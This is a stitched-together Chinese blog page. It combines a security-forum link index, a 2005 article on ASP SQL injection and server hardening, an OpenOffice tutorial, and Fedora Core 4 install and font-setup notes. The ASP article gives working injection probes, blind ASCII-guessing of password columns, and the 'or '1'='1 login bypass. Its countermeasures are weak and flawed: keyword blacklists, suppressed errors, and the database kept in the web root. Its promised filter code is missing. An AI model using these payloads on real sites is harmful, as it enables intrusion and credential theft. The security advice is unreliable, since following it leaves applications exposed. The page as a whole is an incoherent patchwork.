exploit's blog

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

邪恶八进制信息安全团队提倡开放式资料检索 为了方便团队成员和论坛会员自己平时的检索 您不需要登录就可以随便做资料搜索和查阅 以下是一些典型的关键字搜索连接...
事先声明 搜索结果的数目仅供参考 因为每天都有不同的主题加入 所以这个数字是变动的：）
当然 本文章欢迎转载 邪恶八进制信息安全团队对此搜索索引持最终有效解释权...

1.基础学习类索引 推荐主题如下
1.1.邪恶八进制信息安全团队扫盲之 什么是 系列资料
http://www.eviloctal.com/forum/read.php?tid=4500&fpage=1&toread=1

2.安全攻防类索引 推荐主题如下
2.1.注入或injection类 共356条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%D7%A2%C8%EB%7Cinjection
2.2.权限提升或提升权限类 共059条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%CC%E1%C9%FD%C8%A8%CF%DE%7C%C8%A8%CF%DE%CC%E1%C9%FD
2.3.动网或DVBBS渗透类 共084条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%B6%AF%CD%F8%7CDVBBS
2.4.入侵或渗透类 共322条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%C8%EB%C7%D6%7C%C9%F8%CD%B8
2.5.监听或嗅探类 共091条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%BC%E0%CC%FD%7C%D0%E1CC%BD%7Csniffer
2.6.移动及无线类 共057条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%D2%C6%B6%AF%7C%CE%DE%CF%DF%7Cmobile%7Cwireless
2.7.七十七篇前瞻性无线网络安全资料(不断更新)
http://www.eviloctal.com/forum/read.php?tid=4652&fpage=1&toread=1
2.8.RFC中文文档统一收集和上载主题
http://www.eviloctal.com/forum/read.php?tid=13400&fpage=1&toread=1

3.操作系统类索引 推荐主题如下
3.1.窗口操作系统相关类 共778条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=windows
3.2.IIS架设站点及维护相关类 共156条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=iis
3.3.Unix类操作系统相关类 共647条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=unix%7Cfreebsd%7Clinux
3.4.Unix站点架设类 共105条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=apache%7Cftpd
3.5.终端服务或3389类 共065条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%D6%D5%B6%CB%B7%FE%CE%F1%7C3389

4.数据技术索引 推荐主题如下
4.1.数据库相关技术类 共243条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=mysql%7Cmssql%7Coracle
4.2.数据恢复和抢救类 共143条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%BB%D6%B8%B4%7C%C7%C0%BE%C8

5.专业骨干索引 推荐主题如下
5.1.解决方案及安全策略类 共153条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%BD%E2%BE%F6%B7%BD%B0%B8%7C%B0%B2%C8%AB%B2%DF%C2%D4
5.2.路由交换技术类 共152条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=cisco%7C%CB%BC%BF%C6%7C%C2%B7%D3%C9%7C%BD%BB%BB%BB
5.3.拒绝服务攻击监测类 共087条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%BE%DC%BE%F8%B7%FE%CE%F1%7CDDOS
5.4.取证技术类 共042条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%C8%A1%D6%A4%7CForensics

6.资料库存索引 推荐主题如下
6.1.源代码类主题资料 共203条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%D4%B4%B4%FA%C2%EB
6.2.各类电子书及相关资料 共594条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=%A1%B6%7C%A1%B7
6.3.exploit和shellcode相关资料 共838条搜索信息
http://www.eviloctal.com/forum/search.php?keyword=exploit
6.4.上百个开源及非开源软件源代码集中上传专帖(不断更新)
http://www.eviloctal.com/forum/read.php?tid=4450&fpage=1&toread=1
6.5.xxx2xxx转换工具邪恶八进制收集整理上传专用主题(不断更新)
http://www.eviloctal.com/forum/read.php?tid=14426&fpage=1&toread=1
6.6.世界著名杂志Phrack Magazine(飞客杂志)上传专用
http://www.eviloctal.com/forum/read.php?tid=13112&fpage=1&toread=1

新blog入口：heijin.blog.sohu.com

作者：Bluephantom

——从asp程序编写到服务器配置

ASP全称Active Server Pages，是微软推出的用来取代CGI（Common Gateway Interface）的动态服务器网页技术。由于ASP比较简单易学，又有微软这个强大后台的支持，所以应用比较广泛，相对来说发现的缺陷和针对各程序的漏洞也比较多。ASP可运行的服务器端平台包括：WinNT、Win2k、WinXP和Win2003，在Win98环境下装上PWS4.0也可以运行。现在我们就针对Win2k和Win2003这两个系统来谈谈ASP的安全配置。
    
ASP程序安全篇：
在做安全配置前，我们先了解一下入侵者的攻击手法。现在很流行注入攻击，所谓注入攻击，就是利用提交特殊地址将ASP中引用的正常SQL语句和入侵者所需要的SQL语句一并执行，使入侵者达到入侵的目的。现在更是有一些脚本注入工具发布，使菜鸟也可以轻松完成对ASP的注入攻击。那么我们先来了解一下这些工具是怎样注入的。
首先，入侵者会对一个网站确定可不可以进行注入，假设一篇文章的地址为：http://www.scccn.com/news.asp?id=1一般会以提交两个地址来测试，如：
http://www.scccn.com/news.asp?id=1 and 1=1
http://www.scccn.com/news.asp?id=1 and 1=2
第一个地址后面加了 and 1=1，构成的SQL语句也就变为了：Select * from 表单名 where id=1 and 1=1这句话要成立就必须and前后语句都成立。那么前面的文章地址是可以访问的，后面的1=1也是客观成立的，那么第一个地址就可以正常显示；相反1=2是显然不成立的，关键就看这步了，如果提交and 1=2页面还是正常显示说明他并没有将and 1=2写入SQL语句，此站也就不存在注入漏洞；但如果提交and 1=2之后返回了错误页面则说明此站点将后面的语句带入了SQL语句并执行了，也就说明他可以进行SQL注入。（注：如果地址后面跟的是news.asp?id='1'就得变为news.asp?id=1' and '1'='1来补全引号了）
    那么，知道可以注入后入侵者可以做什么呢？
    这里就简单的说一下，比如提交这样的地址：
http://www.scccn.com/news.asp?id=1 and exists (select * from 表名 where 列名=数据)
根据返回的正确或错误页面来判断猜的表名和列名是否正确，具体实现时是先猜表名再猜列名。当猜出表名和列名之后还可以用ASC和MID函数来猜出各列的数据。MID函数的格式为：mid(变量名,第几个字符开始读取,读取几个字符)，比如：mid(pwd,1,2)就可以从变量pwd中的第一位开始读取两位的字符。ASC函数的格式为：ASC（"字符串"），如：asc("a")就可以读出字母a的ASCII码了。那么实际应用的时候就可以写为：asc(mid(pwd,1,1))这样读取的就是pwd列的第一个字符的ASCII码，提交： asc(mid(pwd,1,1))>97以返回的页面是否为正确页面来判断pwd列的第一个字符的ASCII码是否大于97（a的ASCII码），如果正确就再试是否小于122（z的ASCII码）……这样慢慢缩小字符的ASCII码的范围，猜到真实的ASCII码也只是时间的问题。一位一位的猜就可以得到数据库中的用户名和密码了。还有一种ASP验证缺陷——就是用户名和密码都输'or '1'='1，构造SQL语句Select * form 表单名 where username='' or '1'='1' and pwd='' or '1'='1'就可以达到绕过密码验证的目的。
    说了那么多，其实防范的方法很简单，我们把特殊字符（如and、or、'、"）都禁止提交就可以防止注入了。ASP传输数据分为get和post两种，    get是通过将数据添加到URL后提交的方式，post则是利用邮寄信息数据字段将数据传送到服务器。
那么，我们先来看看如何将get方式提交数据中的特殊字符过滤。首先要知道，IIS是以字符串的形式将get请求传给asp.dll的，在将数据传递给Request.QueryString之后，asp解析器会解析出Request.QueryString的信息，然后跟据"&"来分出各个数组内的数据。现在我们要让get方式不能提交以下字符：
'、and、exec、insert、select、delete、update、count、*、%、chr、mid、master、truncate、char、declare
那么，防止get方式注入的代码就如下：

其中，变量sql_leach中的字符串就是指定过滤的字符，以","隔开。
    接着过滤post提交方式的注入，我们可以看到，request.form也是以数组形式存在的，只要对它再进行一次循环判断就可以了。防止以post方式注入的ASP代码如下：

    这样，get和post注入都被禁止了。
    另外就是数据库的问题，首先现在很流行的用*.asp命名数据库已经没什么意义了，因为可以用下载软件来下载；在数据库名前加#的作用也不大，虽然访问时浏览器只访问#前面的内容，但是如果将#用其unicode表达法（%23）替换掉就可以访问了。既然这样，那么我们禁止入侵者暴库就可以了。一般暴数据库的方法，是将读取数据库的文件名（如conn.asp）前的"/"替换为"%5c"（"\"的unicode表达法）这样就可以使ASP将%5c解释为访问网站根目录，而实际是数据库不在指定位置，找不到数据库，再将IE设置为"显示友好的HTTP错误信息"的情况下自然就暴出了数据库的路径。
    防范的方法也比较简单，就是让ASP程序即使在出错的情况下也不报错直接执行下一步就可以了。在ASP文件中加这么一句：on error resume next就OK了。
还有几点要注意的：
1.数据库命名长些并尽量放在网站根目录下，数据库的表名和字段名尽量不合常规；2.保存敏感信息（如用户和密码）的数据库尽量和在前台页面引用的数据库分开（如果用新的暴库方法由前台页面暴出了数据库，那么入侵者也得不到有价值的信息）；3.后台的目录名和登陆页面的名字要改的不寻常些，千万不可出现admin或者login之类的字符，以免被注入软件扫描到后台。4.如果前台或后台有上传文件的功能，切记不能有任何其他功能直接的或间接的拥有更改文件名的权限。这样的多重保障就更加安全些了。
    

ASP服务器安全配置篇（针对win2k和win2003）：
    我们从裸机说起——
    首先，拔掉网线，按需求分区之后将所有盘格式化为NTFS，在D盘安装系统。系统装完之后立刻做一个裸系统的ghost备份，以防后面配置的过程中出意外。
    先把驱动都装上是必要的。之后先装防火墙，选择一款好的防火墙是很重要的。能买硬件防火墙最好，推荐的选择：cisco pix系列、天融信 NGFW系列、冰之眼（入侵检测系统）。没有硬件防火墙的情况下，使用软件防火墙，推荐：Blackice（我个人的最爱）、Checkpoint（以色列国家级防火墙）、ZoneAlarm（不太熟悉，但口碑不错），虽然比较喜欢天网防火墙，但是不推荐服务器用天网。
装完防火墙装杀毒软件，推荐：KV江民杀毒软件（好东西）、诺顿（虽然好，但比较霸道）、卡巴斯基（听说比较耗内存，但对病毒疗效狂好）。
开始安装各种需要的软件，如果是2003系统，别忘了装IIS。以上所有软件都装在一个非统盘的指定盘里。
下面开始给系统打补丁，首先用手头有的光盘给2k打上SP4或给2003打上SP1。在本地操作的情况下将能打系统和软件的补丁都打上。之后，在确认防火墙和杀毒软件都设置好的情况下插上网线，开始window update，并升级杀毒软件至最新病毒库。打完所有的系统和软件的补丁之后，将网线拔掉，把所有临时文件和系统补丁留下的卸载文件全部删除，如果觉得占用空间太多还可以把%systemroot%\System32\dllcache\下的所有文件删除（系统备份文件），这将使最后的ghost备份文件体积比较小。然后再次用ghost备份系统。
之后删除不安全的组件，需要将WScript.Shell, WScript.Network, Shell.application删除掉。在cmd下分别输入（以2k为例，2003路经为D:\windows）：
regsvr32/u D:\WINNT\System32\wshom.ocx
del D:\WINNT\System32\wshom.ocx
重新启动，就OK了。另外入侵者可以利用getobject("WINNT")获得用户和进程的列表，可以将Workstation服务禁用作为防范措施。
设置权限是必要的。首先，确定IIS里要建立几个站点，之后为每个站点建立一个用户。在IIS站点的目录安全性里选择让这个用户作为匿名访问的帐户。再设置所有分区都禁止这个用户访问，而在站点对应的文件夹设置允许此用户访问。这样即使站点被入侵，入侵者也拿不到服务器的shell。
一切做好之后用ghost再次备份，并将做好的备份文件放在与服务器不在同一局域网的机器上或相对安全的地方。插上网线，服务器就可以安全的正常工作了。之后可以在每次服务器重起时还原一次系统，这都是后话了。


好了，基本上就这么多了，以上说的可能不太完全，仅作参考之用，不足之处还请高手多多补充。欢迎各位来中国网络安全中心交流：http://www.scccn.com。

Bluephantom作于2005年

http://www.linuxeden.com/forum/t132115.html

著名的OpenOffice(下文简称为OO)项目是1999年Sun公司收购了StarOffice后的开源项目。基于OO的产品也层出不穷，典型的如Sun的StarOffice(亚洲版本称为StarSuite)、中文2000的RedOffice、中标软的普华Office以及刚刚发布的金山飓风办公等。因此，学好OpenOffice，基本上就学会了好几种Linux下的办公软件了。

　　一、OpenOffice的功能模块

　　OO主要是由四大模块即文字处理模块Writer、电子表格模块Calc、幻灯片模块Impress以及绘图模块Draw组成，对于这些大家可以参见Linux一月通专题中的有关介绍。

　　它和微软Office最大的区别是OO的设计理念更趋于集中整合，虽然OO文档看似保存为不同扩展名的文件，其实都是采用XML格式保存后再使用ZIP压缩算法压缩得到的。所以只要一次性启动OO后，创建/打开不同文档不必像微软Office那样分别启动不同的程序，而只是变化为相应的界面而已，下面笔者就详细介绍一下OO中使用频率最高的模块Writer的使用。

　　小知识:OpenOffice文档扩展名知多少

　　Writer文档的扩展名为sxw
　　Calc文档的扩展名为sxc
　　Impress文档的扩展名为sxi
　　Draw文档的扩展名为sxd

　　提示：OO的衍生产品如StarSuite6/7、RedOffice、普华Office、即时Office以及金山飓风办公大致都是由这四个模块构成，使用上也类似，只不过特色有所不同而已，大家可以触类旁通、举一反三地学习。

　　二、认识Writer

　　Writer的界面很具有代表性，熟练地掌握了它的界面后对于其他模块的学习会有很大的帮助！下面笔者就以中文本地化比较好的RedOffice 为例来介绍一下Writer的使用。Writer主界面如图1所示。

图 1

　　界面上部和Word基本相同，不同的是其左侧多一个主工具栏，该栏按钮从上到下依次为插入、插入域、绘图、表单、图文集、定位光标、打开/关闭拼写检查、查找、数据源、非打印字符、关闭图形对象显示和Web版式。其中插入、绘图，表单都可以拖动为浮动工具栏。

　　提示：在熟悉界面的过程中最好能和自己熟悉的Word的常用功能对应起来！

　　三、用 Writer创建自己第一份Linux文档

　　下面就以对汉字支持很好与OO界面一致的RedOffice为例来创建第一份Writer文档。

　　1.新建一个Writer文档

　　选择Writer的主菜单“文件→新建→文字处理”便可创建一份空白的Writer文档。

　　小技巧：Writer窗口处于激活状态，使用快捷键“Ctrl+N”可以便捷地创建文档。

　　2.输入标题及其设置

　　输入文档的标题，然后拖动鼠标，标题处于反白状态，这时在字号下拉列表中选择三号字，然后选择旁边的粗体按钮加粗标题使之更加突出。最后使用Home键定位光标，然后单击居中按钮将标题置于文档上方正中位置。另起一行输入文档起草人后便可编辑正文了！

　　小技巧：如果文章比较长，会常常找不到光标位置的情况，这时只要单击一下主工具栏的定位光标键便可迅速找到光标！

　　3.插入图片

　　优秀的文档怎能没有精美的图片呢？选择主菜单“插入→图形→从文件”后便会弹出插入图形对话框，从中找到要插入的图片文件，确定后便可插入到文档中，双击插入的图片就会弹出图形对话框，在该对话框中可以设置文字环绕，边框以及完成图片的裁剪与翻转。详细选项请参照图2。

图2

4.插入表格

　　一个具有说服力的文档不能没有表格，选择主菜单“插入→表格”后便会弹出插入表格对话框，在该对话框中简单地设置一下行数和列数便可立即生成表格，接下来便可输入内容编辑表格了！插入表格对话框请参照图3。

图3

5.为表格添加日期

　　由于表格中的内容具有很强的时效性，所以很有必要为表格添加日期时间，将光标定位到表格的右下角，从主菜单选择“插入→日期时间”后便会出现日期和时间对话框。Writer提供了多种日期格式供大家选择，选择一种格式确定后就OK了！

　　6.字数统计

　　大家的第一份具有实用价值的Linux文档终于完成了，统计一下文档字数是十分必要的，在主菜单种选择“文件→属性→统计标签页”便可看到准确的字数统计，这对于撰稿人来说尤为重要噢！

　　看到这里相信大家对OpenOffice项目有所了解了吧！还不快赶紧启动你的Writer练练手？

这是我在网上找到的/etc/fstab文件修改后可以自动挂载，并显示中文目录，这个比较实用，希望大家能派上用场，下面就是例子。

# /etc/fstab: static file system information.
#
#
proc /proc proc defaults 0 0
/dev/hdc2 / ext3 defaults,errors=remount-ro 0 1
/dev/hdc5 none swap sw 0 0
/dev/hdb /media/cdrom0 iso9660 ro,user,noauto 0 0
/dev/hda1 /mnt/win_c vfat codepage=936,iocharset=cp936 0 0
/dev/hda5 /mnt/win_d ntfs iocharset=cp936 0 0
/dev/hda6 /mnt/win_e ntfs iocharset=cp936 0 0
/dev/hda7 /mnt/win_f vfat codepage=936,iocharset=cp936 0 0
/dev/hda8 /mnt/win_g vfat codepage=936,iocharset=cp936 0 0
/dev/hdc1 /mnt/win_h vfat codepage=936,iocharset=cp936 0 0

来源：linuxfans.org

刚刚下载完FC4，安装完了，现在把我安装的大体经过写一下，仅供参考。
一，硬盘安装：
1.下载 iso文件：
FC4-i386-DVD.isohttp://download.fedora.redhat.com/pub/fedora/linux/core/4/i386/iso/FC4-i386-DVD.iso
放在一个 fat32 或ext3分区上，我是：Windows Xp+ Fedora Core 4 双启动，下载完ISO文件放在一个Fat32分区上（最好不要放在NTFS分区上），然后用 WinRAR 提取ISO文件里的isolinux 目录一个分区上（如：可以在Windows Xp 里面用WINRAR提取 光盘镜像里 isolinux 目录到C：\下）。
2.下载：Grub For Dos ：
http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&op=geninfo&did=3608
解压到C:\下，编辑 boot.ini 文件，加入：
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
C:\grldr="GRUB For Dos/Windows "
编辑C:\boot\grub\menu.lst 加入：
title Install-Fedora Core 4
kernel (hd0,0)/isolinux/vmlinuz
initrd (hd0,0)/isolinux/initrd.img
3.重新启动电脑，依次选择： GRUB For Dos/Windows > Install-Fedora Core 4
进入安装程序，在安装过程中当进行到选择安装介质时，选 硬盘安装。
4.按提示一步步安装，直到完成重启！
5.安装完成后运行 yum update 更新系统
#rpm -import /usr/share/rhn/RPM-GPG-KEY-fedora
#yum update
6.安装中文输入法Fcitx
下载 Fcitx-3.1：http://www.linuxfans.org/nuke/modul...geninfo&did=360
安装： #rpm -ivh fcitx-3.1-1mgc.i686.rpm
7.在/etc/X11/xinit/xinput.d下面创建一个自己的输入法的脚本 fcitx 内容为：
XIM=fcitx
XIM_PROGRAM=fcitx
GTK_IM_MODULE=fcitx
gnome-im-settings-daemon >/dev/null
添加配置：
#alternatives –install /etc/X11/xinit/xinput.d/zh_CN xinput-zh_CN /etc/X11/xinit/xinput.d/fcitx 100
#alternatives --auto xinput-zh_CN
重启X Window 生效！
8.安装Mp3播放器XMMS（ FC4中默认是没有XMMS的）

#yum install xmms
2.安装mp3 插件：xmms-mp3-1.2.10-2.2.p.1.fc2.fr.i386.rpm ：
http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&op=geninfo&did=3060
#rpm -ivh xmms-mp3-1.2.10-2.2.p.1.fc2.fr.i386.rpm
3.安装Realplayer：http://www.linuxfans.org/nuke/modul...eninfo&did=3166
#rpm -ivh RealPlayer-10.0.4.750-20050401.i586.rpm
4.安装ＬｕｍａＱＱ的话去下载lumaqq然后解压就可以用的，很简单的。
还有一个必备软件就是星际译王了。我们可以到它主页下载主程序包http://stardict.sourceforge.net/stardict-2.4.4-1.i386.rpm
sdcv-0.1.tar.bz2这个是字符下用的
WyabdcRealPeopleTTS这个是语音文件
#rpm -Uvh stardict-2.4.4-1.i386.rpm
安装主程序
字典到http://stardict.sourceforge.net/Dictionaries_zh_CN.php下载，自己因需选

如何关闭 ipv6 以解决域名解析慢的问题：将下面两行追加到 /etc/modprobe.conf br />
alias net-pf-10 off
alias ipv6 off


美化字体不许要补丁,也不需要打命令,方法如下:
1:安装完毕后进入
[root@S01 ~]#cd /usr/share/fonts/chinese/TrueTypa
2:删除:ghai00mp.ttf/gbsn00lp.ttf/bsmi00lp.ttf/bkai00mp.ttf四个字体文件
[root@S01 ~]#rm -rf ghai00mp.ttf gbsn00lp.ttf bkai00mp.ttf
3:将simsun.ttc重命名为:ghai00mp.ttf和bkai00mp.ttf,并放到/usr/share/fonts/chinese/TrueTypa下
simsun 下载地址： http://ants.keepso.com/cgi-bin/bfile?word=simsunttc
4:重起系统就可以看到保留英文字体,而中文字体变成新宋体的操作界面了!
如何让x0mms播放列表里显示正确的中文(myxfc)
-*-*-*-*-*-iso8859-1,-misc-simsun-medium-r-normal--12-*-*-*-*-*-gbk-0,*-r-

注意事项：

1.linux的命令和文件名有大小写之分

2.美化之前，把你所要改动的原文件备份一下
比如，我想备份/root目录下的.bashrc,前面有个小点。不要忘记了。要这样做
#cd /root
#cp .bashrc .bashrc.BAK

如果我们失误时，我们能够还原，方法如下：
#cp .bashrc.BAK .bashrc

3.修改相关文件的工具，用vi或者kate，请不要用gedit。切记！！

4.simsun.ttc；fonts.dir；fonts.scale三个文件是在一个目录里，也就是说是在同一个目录里/home/fonts

5.值得注意的是，我们用的是simsun.ttc，不是simsun.ttf来美化。如果您有simsun.ttf字体，可以把simsun.ttf改成simsun.ttc。注意文件的后缀。

1.在/home目录下建一个目录fonts
在菜单上点-》系统工具-》终端，然后输入建立目录命令

[root@linuxsir01 root]# mkdir /home/fonts

2.然后把simsun.ttc字体拷到/home/fonts目录下。如果您没有simsun.ttc，只有simsun.ttf，我们也可以把 simsun.ttf改名为simsu.ttc。如果您的字体是在windows的分区。我们可以用mount来解决。如何用mount，因为内容比较多，建议用您看一下置顶的帖子。

如果是simsun.ttf，我们就为simsun.ttf改名为simsun.ttc，假如您已经把simsun.ttf拷到了/home/fonts，就按如下的操作来完成。如果您的字体已经是simsun.ttc了，就没有必要做这步了。

[root@linuxsir01 root]# cd /home/fonts

[root@linuxsir01 fonts]# mv simsun.ttf simsun.ttc

3.为simsun.ttc来建字体文件，总共有两个，分别是fonts.dir和fonts.scale。我们还是在simsun字体所处的目录/home/fonts操作

进入/home/fonts目录

[root@linuxsir01 root]#cd /home/fonts

用touch先来建一fonts.dir文件

[root@linuxsir01 fonts]# touch fonts.dir


看一下，我们是不是把fonts.dir文件建好了？
[root@linuxsir01 fonts]# ls

然后，我们用kate编辑器来打开fonts.dir，还是要在/home/fonts目录里操作
[root@linuxsir01 fonts]#kate fonts.dir

然后把下面的蓝色的一段拷入kate打开的fonts.dir文件，然后保存退出。

31
simsun.ttc -misc-fixed-medium-r-normal--0-0-0-0-c-0-gb2312.1980-0
simsun.ttc -misc-simsun-medium-r-normal--0-0-0-0-c-0-gb2312.1980-0
ai=0.2:simsun.ttc -misc-simsun-medium-o-normal--0-0-0-0-c-0-gb2312.1980-0
ai=0.4:simsun.ttc -misc-simsun-medium-i-normal--0-0-0-0-c-0-gb2312.1980-0
ab=y:simsun.ttc -misc-simsun-bold-r-normal--0-0-0-0-c-0-gb2312.1980-0
ai=0.2:ab=y:simsun.ttc -misc-simsun-bold-o-normal--0-0-0-0-c-0-gb2312.1980-0
ai=0.4:ab=y:simsun.ttc -misc-simsun-bold-i-normal--0-0-0-0-c-0-gb2312.1980-0
sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-r-normal--0-0-0-0-c-0-iso8859-1
ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-r-normal--0-0-0-0-c-0-iso8859-1
ai=0.2:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-o-normal--0-0-0-0-c-0-iso8859-1
ai=0.4:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-i-normal--0-0-0-0-c-0-iso8859-1
ai=0.2:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-o-normal--0-0-0-0-c-0-iso8859-1
ai=0.4:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-i-normal--0-0-0-0-c-0-iso8859-1
ai=-0.2:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-ro-normal--0-0-0-0-c-0-iso8859-1
ai=-0.4:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-ri-normal--0-0-0-0-c-0-iso8859-1
ai=-0.2:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-ro-normal--0-0-0-0-c-0-iso8859-1
ai=-0.4:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-ri-normal--0-0-0-0-c-0-iso8859-1
ai=-0.4:simsun.ttc -misc-simsun-medium-ri-normal--0-0-0-0-c-0-gb2312.1980-0
ai=-0.4:ab=y:simsun.ttc -misc-simsun-bold-ri-normal--0-0-0-0-c-0-gb2312.1980-0
ai=-0.2:simsun.ttc -misc-simsun-medium-ro-normal--0-0-0-0-c-0-gb2312.1980-0
ai=-0.2:ab=y:simsun.ttc -misc-simsun-bold-ro-normal--0-0-0-0-c-0-gb2312.1980-0
simsun.ttc -misc-simsun-medium-r-normal--0-0-0-0-c-0-gbk-0
ai=0.2:simsun.ttc -misc-simsun-medium-o-normal--0-0-0-0-c-0-gbk-0
ai=0.4:simsun.ttc -misc-simsun-medium-i-normal--0-0-0-0-c-0-gbk-0
ab=y:simsun.ttc -misc-simsun-bold-r-normal--0-0-0-0-c-0-gbk-0
ai=0.2:ab=y:simsun.ttc -misc-simsun-bold-o-normal--0-0-0-0-c-0-gbk-0
ai=0.4:ab=y:simsun.ttc -misc-simsun-bold-i-normal--0-0-0-0-c-0-gbk-0
ai=-0.4:simsun.ttc -misc-simsun-medium-ri-normal--0-0-0-0-c-0-gbk-0
ai=-0.4:ab=y:simsun.ttc -misc-simsun-bold-ri-normal--0-0-0-0-c-0-gbk-0
ai=-0.2:simsun.ttc -misc-simsun-medium-ro-normal--0-0-0-0-c-0-gbk-0
ai=-0.2:ab=y:simsun.ttc -misc-simsun-bold-ro-normal--0-0-0-0-c-0-gbk-0


注：您也下地附件，把下载的附件font.txt的拷到/home/fonts目录下，并改名为fonts.dir和fonts.scale
http://www.linuxsir.com/bbs/attachm...tachmentid=2389
假如您把附件下载到了/root目录下，就要如下操作
[root@linuxsir01 root]# cp font.txt /home/fonts/fonts.dir
[root@linuxsir01 root]# cp font.txt /home/fonts/fonts.scale
这样就完成了，应该很简单吧。

4.修改/etc/X11/XF86Config文件。也可以用kate编辑器来修改。要先把/etc/X11/XF86Config这件文件备份一下，然后再操作。这样做的目的是我们改错了文件，可以再把原文件恢复过去。

1]备份
进入/etc/X11目录
[root@linuxsir01 root]# cd /etc/X11/
备份
[root@linuxsir01 X11]# cp XF86Config XF86ConfigBAK

如果我们改错了，我们就要这样来恢复。以后改文件的过程都是这样，就不再多说了。
[root@linuxsir01 X11]# cp XF86ConfigBAK XF86Config

2]用kate编辑器来改文件，在/etc/X11目录里操作

[root@linuxsir01 X11]# kate XF86Config

在FontPath "unix/:7100"前一行，加入FontPath "/home/fonts"这样的一行

在Section "Module"这段内加入
Load "xtt"这一行，更详细的请见第二帖，如果不加Load "xtt"这行，会出现程序乱码！！
把Load "freetype"和Load "type1"两行前面加上#号来注销掉。

5.修改/etc/fonts/fonts.conf，还是象前面说一样，要备份。此过程省略

[root@linuxsir01 X11]# cd /etc/fonts

用kate编辑器打开fonts.conf

[root@linuxsir01 fonts]# kate fonts.conf

我们要在打开的fonts.conf中加入下面的一行

<dir>/home/fonts</dir>


加在什么地方呢？就加在下面这三行的前面就行

<dir>/usr/X11R6/lib/X11/fonts/Type1</dir>
<dir>/usr/share/fonts</dir>
<dir>~/.fonts</dir>

[COLOIR=blue]您也可以下载fonts.conf的附件，下载后改名为fonts.conf，并复制到/etc/fonts目录下，比如您是下载到了/tmp目录中，我们可以这样做

#cd /tmp
#cp fonts.conf.txt /etc/fonts/fonts.conf
也就是说把原文件覆盖就行了。

[/COLOR]
http://www.linuxsir.com/bbs/attachm...=&postid=207853

6.修改/etc/gtk/gtkrc.zh_CN文件，要先备份。前后有说过了，不再多说。

[root@linuxsir01 root]# cd /etc/gtk/

[root@linuxsir01 gtk]# kate gtkrc.zh_CN

改成下面这样的。

# $(gtkconfigdir)/gtkrc.zh_CN
#
# This file defines the fontsets for Chinese language (zh) using
# the simplified chinese standard GuoBiao as in mainland China (CN)
#
# 1999, Pablo Saratxaga <pablo@mandrakesoft.com>
#

style "gtk-default-zh-cn" {
fontset = "-misc-simsun-medium-r-normal--14-*-*-*-*-*-gb2312.1980-0,\
-misc-simsun-medium-r-normal--14-*-*-*-*-*-gb2312.1980-0"
}
class "GtkWidget" style "gtk-default-zh-cn"

对于/etc/gtkrc.zh_CN中，也可以下载我传上来的附件。下载后要改名为gtkrc.zh_CN,要注意大小写，然后拷到/etc/gtk目录下

http://www.linuxsir.com/bbs/attachm...=&postid=205425



到此为止，前期的准备工作已经结束了，我们来美化各个用户的gnome和kde了。我们以root用户为例来解说明：


1.在当前用户目录下的.bashrc文件里加入:
export GDK_USE_XFT=0
如果是root用户，就要如下操作，不要忘记备份.bashrc，注意：前面有个小点。备份的过程省略，过程请参考前文。

[root@linuxsir01 root]# kate ~/.bashrc

把export GDK_USE_XFT=0这行，放在下面的两行中间。
# .bashrc
export GDK_USE_XFT=0
# User specific aliases and functions

2.如果您是以root身份登入的gnome桌面，就要把gnome的字体设置成san12
这个过程在gnome菜单=》首选项=》字体中设置。

3.如果让kde也一样有美观的效果，我们就要运行如下的命令

[root@linuxsir01 root]# qtconfig

具体如图所示，更改完后，不要忘记[保存]


4.以root身份登入kde，我们就要在kde中的控制中心-》观感-》字体中，你可以把字体设置为simsun 12就好了。
在观感=》桌面=》外观=》把字体设置为simsun 大小为12

在kde控制中心=》文件管理器=》外观中，把字体设置为 simsun 12

5.mozilla的字体[必须升级mozilla才能解决英文字体发虚的现象]

mozilla菜单edit->preference-》appearence-》fonts中。如图设置

如果想让mozilla升级成中文版的，可以参考这个帖子。
http://www.linuxsir.com/bbs/showthr...&threadid=10026

如果您下载的是Mozilla的免安装包，请看这里
http://people.linux.net.cn/holywen/
我们就要先把/usr/lib/mozilla-1.2.1目录改名为mozilla-1.2.1BAK，然后我们把下载下来的包复制到/usr/lib/mozilla-1.2.1目录里。

tar zxvf *.tar.gz

#cp -r mozilla /usr/lib/mozilla-1.2.1

11.xmms的字体设置，或看图设置：在XMMS的菜单上=》选项=》功能设定=》fonts中。把

xmms的playlist字体为:

-misc-simsun-medium-r-normal-*-*-120-*-*-c-*-gbk-0
main window是:

-misc-simsun-medium-r-normal-*-*-120-*-*-c-*-gbk-0

12.gnome中的终端的字体设置

